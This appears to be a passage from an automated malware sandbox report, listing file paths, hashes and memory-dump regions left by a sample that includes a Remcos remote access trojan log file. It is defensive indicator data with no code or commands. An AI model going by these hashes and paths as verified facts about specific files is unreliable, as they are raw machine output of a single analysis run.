
C:\Users\Public\Libraries\netutils.dll

MD5 30468939b69d5b1f29494fff5b161e6b
SHA1 3f900a76e5a00efd97c618c8cdaa55e66384618f
SHA256 7c6b2128913876dcb70603f2c00618d2e9057f381766565baf2a37100b85f1fd
SHA512 f59fc26b77b28bc0dce41f2542c95a0fcb32204cc2d840d7cf8e74e10fbfc238f0c360e3bb5d787f32c83668ad10bbe522e098ede52f178dd8555c7af530f27f

memory/1612-52-0x00000000613C0000-0x00000000613E3000-memory.dmp

memory/1688-60-0x000001FE58D90000-0x000001FE58DB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht5r0wdy.fhu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1688-65-0x00007FF8CA600000-0x00007FF8CB0C1000-memory.dmp

memory/1688-66-0x000001FE58BE0000-0x000001FE58BF0000-memory.dmp

memory/1688-67-0x000001FE58BE0000-0x000001FE58BF0000-memory.dmp

memory/1688-70-0x00007FF8CA600000-0x00007FF8CB0C1000-memory.dmp

memory/4600-75-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-76-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-78-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-79-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-80-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-83-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-84-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-85-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-86-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-87-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-89-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-90-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4432-91-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4600-94-0x0000000000A30000-0x0000000000A31000-memory.dmp

memory/464-95-0x0000000000400000-0x0000000000462000-memory.dmp

memory/464-99-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1148-100-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4432-105-0x0000000000400000-0x0000000000478000-memory.dmp

memory/464-106-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1148-108-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1148-116-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1148-112-0x0000000000430000-0x00000000004F9000-memory.dmp

memory/1148-111-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4432-102-0x0000000000400000-0x0000000000478000-memory.dmp

memory/464-101-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4432-96-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4432-125-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4600-128-0x00000000349F0000-0x0000000034A09000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ktpkhvfthsyqlgpjvgyjt

MD5 32100ea472bc470ba10f60a11c782c0e
SHA1 078aa6214b8ca1c3562774453abca6c8806a13c3
SHA256 d6132e01d239dbbe0f686e1a18cd57d7cf272e34ab03b7f483f5147c00d374ad
SHA512 df7aaa762f5546a9e783b5a15a9cd5a3e66ec43b5502b025d621f106e63008095461a96d5f1f06791cac6322e0c418eb6de476b6856338e2f5fc2d038ca10d6b

memory/4600-131-0x00000000349F0000-0x0000000034A09000-memory.dmp

memory/4600-133-0x00000000349F0000-0x0000000034A09000-memory.dmp

memory/4600-134-0x00000000349F0000-0x0000000034A09000-memory.dmp

memory/4600-135-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-137-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-138-0x0000000016310000-0x0000000017310000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 4c6f9bc5f7cce91fb0fa69b146bbe6db
SHA1 c5939dca12352c003cfdb7e4ad84b9fc13d7d61d
SHA256 60d9aaec54eb8981261dd07fe04a3f922fdf0af3059a0eb63795f639e34ef97b
SHA512 f4855337828bc03d2f766e69c397d500d8e700ff291bae0a5563dd0aef0112ea02842ffbc868edfdd423efb1d4d6e8995d30e3d799541f126fa9dc36da62e73f

memory/4600-145-0x00000000349F0000-0x0000000034A09000-memory.dmp

memory/4600-149-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-150-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-160-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-161-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-171-0x0000000016310000-0x0000000017310000-memory.dmp

memory/4600-172-0x0000000016310000-0x0000000017310000-memory.dmp